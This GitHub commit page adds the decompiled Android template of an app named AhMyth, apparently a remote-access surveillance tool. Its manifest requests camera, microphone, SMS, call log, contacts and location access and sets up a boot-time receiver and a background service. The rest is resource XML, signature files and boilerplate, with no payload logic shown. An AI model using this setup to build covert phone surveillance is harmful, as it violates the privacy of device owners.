This repository has been archived by the owner on Sep 3, 2021. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
8,390 changed files
with
1,227,462 additions
and
0 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
<?xml version="1.0" encoding="utf-8" standalone="no"?> | ||
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="ahmyth.mine.king.ahmyth" platformBuildVersionCode="24" platformBuildVersionName="7.0"> | ||
<uses-permission android:name="android.permission.WAKE_LOCK"/> | ||
<uses-permission android:name="android.permission.CAMERA"/> | ||
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> | ||
<uses-permission android:name="android.permission.INTERNET"/> | ||
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/> | ||
<uses-permission android:name="android.permission.READ_SMS"/> | ||
<uses-permission android:name="android.permission.SEND_SMS"/> | ||
<uses-feature android:name="android.hardware.camera"/> | ||
<uses-feature android:name="android.hardware.camera.autofocus"/> | ||
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/> | ||
<uses-permission android:name="android.permission.READ_PHONE_STATE"/> | ||
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/> | ||
<uses-permission android:name="android.permission.READ_CALL_LOG"/> | ||
<uses-permission android:name="android.permission.RECORD_AUDIO"/> | ||
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/> | ||
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> | ||
<uses-permission android:name="android.permission.READ_CONTACTS"/> | ||
<application android:allowBackup="true" android:hardwareAccelerated="false" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:largeHeap="true" android:supportsRtl="true" android:theme="@style/AppTheme"> | ||
<activity android:launchMode="singleInstance" android:name="ahmyth.mine.king.ahmyth.MainActivity"> | ||
<intent-filter> | ||
<action android:name="android.intent.action.MAIN"/> | ||
<category android:name="android.intent.category.LAUNCHER"/> | ||
</intent-filter> | ||
</activity> | ||
<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/> | ||
<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver"> | ||
<intent-filter> | ||
<action android:name="android.intent.action.BOOT_COMPLETED"/> | ||
</intent-filter> | ||
</receiver> | ||
</application> | ||
</manifest> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
!!brut.androlib.meta.MetaInfo | ||
apkFileName: app.apk | ||
compressionType: false | ||
doNotCompress: | ||
- arsc | ||
isFrameworkApk: false | ||
packageInfo: | ||
forcedPackageId: '127' | ||
renameManifestPackage: null | ||
sdkInfo: | ||
minSdkVersion: '10' | ||
targetSdkVersion: '18' | ||
sharedLibrary: false | ||
unknownFiles: {} | ||
usesFramework: | ||
ids: | ||
- 1 | ||
tag: null | ||
version: 2.2.1 | ||
versionInfo: | ||
versionCode: '1' | ||
versionName: '1.0' |
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
Signature-Version: 1.0 | ||
X-Android-APK-Signed: 2 | ||
SHA1-Digest-Manifest: +jAjQfCl6rwdWauwn46TeERe8Zo= | ||
Created-By: 1.0 (Android) | ||
|
||
Name: res/mipmap-mdpi-v4/ic_launcher.png | ||
SHA1-Digest: KhYs3OgngrsQpHbyXG/jm5H+8wU= | ||
|
||
Name: AndroidManifest.xml | ||
SHA1-Digest: K/3ab9bP0mZnRJy1CsPEgDz46ns= | ||
|
||
Name: res/layout/activity_main.xml | ||
SHA1-Digest: m6igKT3+ME03AdFwmQ8JzZXSxhk= | ||
|
||
Name: res/mipmap-xhdpi-v4/ic_launcher.png | ||
SHA1-Digest: A92PbPheHa+C5hP2bAXLmZFjEYY= | ||
|
||
Name: resources.arsc | ||
SHA1-Digest: 0PP9a85sPEMkh64UWry0uPL2NGg= | ||
|
||
Name: classes.dex | ||
SHA1-Digest: +b5z44wqsWI8sar/wgwesA65c7I= | ||
|
||
Name: res/mipmap-xxhdpi-v4/ic_launcher.png | ||
SHA1-Digest: TtBU8d63+I+lSLj+Tm5DZvZ5i2c= | ||
|
||
Name: res/mipmap-xxxhdpi-v4/ic_launcher.png | ||
SHA1-Digest: Z+/XJPt1sAKFXReYL68NU6geHLc= | ||
|
||
Name: res/mipmap-hdpi-v4/ic_launcher.png | ||
SHA1-Digest: dgOODFlTpfHDDTUL6xuLQSdAG7w= | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
Manifest-Version: 1.0 | ||
Built-By: Generated-by-ADT | ||
Created-By: Android Gradle 2.2.0 | ||
|
||
Name: res/mipmap-mdpi-v4/ic_launcher.png | ||
SHA1-Digest: KhYs3OgngrsQpHbyXG/jm5H+8wU= | ||
|
||
Name: AndroidManifest.xml | ||
SHA1-Digest: K/3ab9bP0mZnRJy1CsPEgDz46ns= | ||
|
||
Name: res/layout/activity_main.xml | ||
SHA1-Digest: m6igKT3+ME03AdFwmQ8JzZXSxhk= | ||
|
||
Name: res/mipmap-xhdpi-v4/ic_launcher.png | ||
SHA1-Digest: A92PbPheHa+C5hP2bAXLmZFjEYY= | ||
|
||
Name: resources.arsc | ||
SHA1-Digest: 0PP9a85sPEMkh64UWry0uPL2NGg= | ||
|
||
Name: classes.dex | ||
SHA1-Digest: +b5z44wqsWI8sar/wgwesA65c7I= | ||
|
||
Name: res/mipmap-xxhdpi-v4/ic_launcher.png | ||
SHA1-Digest: TtBU8d63+I+lSLj+Tm5DZvZ5i2c= | ||
|
||
Name: res/mipmap-xxxhdpi-v4/ic_launcher.png | ||
SHA1-Digest: Z+/XJPt1sAKFXReYL68NU6geHLc= | ||
|
||
Name: res/mipmap-hdpi-v4/ic_launcher.png | ||
SHA1-Digest: dgOODFlTpfHDDTUL6xuLQSdAG7w= | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<RelativeLayout android:id="@id/activity_main" android:paddingLeft="@dimen/activity_horizontal_margin" android:paddingTop="@dimen/activity_vertical_margin" android:paddingRight="@dimen/activity_horizontal_margin" android:paddingBottom="@dimen/activity_vertical_margin" android:layout_width="fill_parent" android:layout_height="fill_parent" | ||
xmlns:android="http://schemas.android.com/apk/res/android"> | ||
<FrameLayout android:id="@id/camera_preview" android:layout_width="fill_parent" android:layout_height="fill_parent" android:layout_weight="1.0" android:layout_above="@id/btnCapture" /> | ||
<Button android:id="@id/btnCapture" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Button" android:layout_alignParentBottom="true" android:layout_centerHorizontal="true" android:onClick="onClick" /> | ||
</RelativeLayout> |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<resources> | ||
<dimen name="activity_horizontal_margin">64.0dip</dimen> | ||
</resources> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<resources> | ||
<color name="colorAccent">#ffff4081</color> | ||
<color name="colorPrimary">#ff3f51b5</color> | ||
<color name="colorPrimaryDark">#ff303f9f</color> | ||
</resources> | ||
This comment has been minimized.
Sorry, something went wrong. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<resources> | ||
This comment has been minimized.
Sorry, something went wrong. |
||
<dimen name="activity_horizontal_margin">16.0dip</dimen> | ||
<dimen name="activity_vertical_margin">16.0dip</dimen> | ||
</resources> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<resources> | ||
<item type="id" name="activity_main">false</item> | ||
<item type="id" name="camera_preview">false</item> | ||
<item type="id" name="btnCapture">false</item> | ||
</resources> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,15 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<resources> | ||
<public type="mipmap" name="ic_launcher" id="0x7f020000" /> | ||
<public type="layout" name="activity_main" id="0x7f030000" /> | ||
<public type="dimen" name="activity_horizontal_margin" id="0x7f040000" /> | ||
<public type="dimen" name="activity_vertical_margin" id="0x7f040001" /> | ||
<public type="color" name="colorAccent" id="0x7f050000" /> | ||
<public type="color" name="colorPrimary" id="0x7f050001" /> | ||
<public type="color" name="colorPrimaryDark" id="0x7f050002" /> | ||
<public type="string" name="app_name" id="0x7f060000" /> | ||
<public type="style" name="AppTheme" id="0x7f070000" /> | ||
<public type="id" name="activity_main" id="0x7f080000" /> | ||
<public type="id" name="camera_preview" id="0x7f080001" /> | ||
<public type="id" name="btnCapture" id="0x7f080002" /> | ||
</resources> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<resources> | ||
<string name="app_name">AhMyth</string> | ||
</resources> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<resources> | ||
<style name="AppTheme" parent="@android:style/Theme.Holo.Light.DarkActionBar" /> | ||
</resources> |
29 changes: 29 additions & 0 deletions
29
app/app/Factory/Ahmyth/smali/ahmyth/mine/king/ahmyth/BuildConfig.smali
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
.class public final Lahmyth/mine/king/ahmyth/BuildConfig; | ||
.super Ljava/lang/Object; | ||
.source "BuildConfig.java" | ||
|
||
|
||
# static fields | ||
.field public static final APPLICATION_ID:Ljava/lang/String; = "ahmyth.mine.king.ahmyth" | ||
|
||
.field public static final BUILD_TYPE:Ljava/lang/String; = "release" | ||
|
||
.field public static final DEBUG:Z = false | ||
|
||
.field public static final FLAVOR:Ljava/lang/String; = "" | ||
|
||
.field public static final VERSION_CODE:I = 0x1 | ||
|
||
.field public static final VERSION_NAME:Ljava/lang/String; = "1.0" | ||
|
||
|
||
# direct methods | ||
.method public constructor <init>()V | ||
.locals 0 | ||
|
||
.prologue | ||
.line 6 | ||
invoke-direct {p0}, Ljava/lang/Object;-><init>()V | ||
|
||
return-void | ||
.end method |
Oops, something went wrong.
name="colorPrimary">#ff3f51b5
#ff303f9f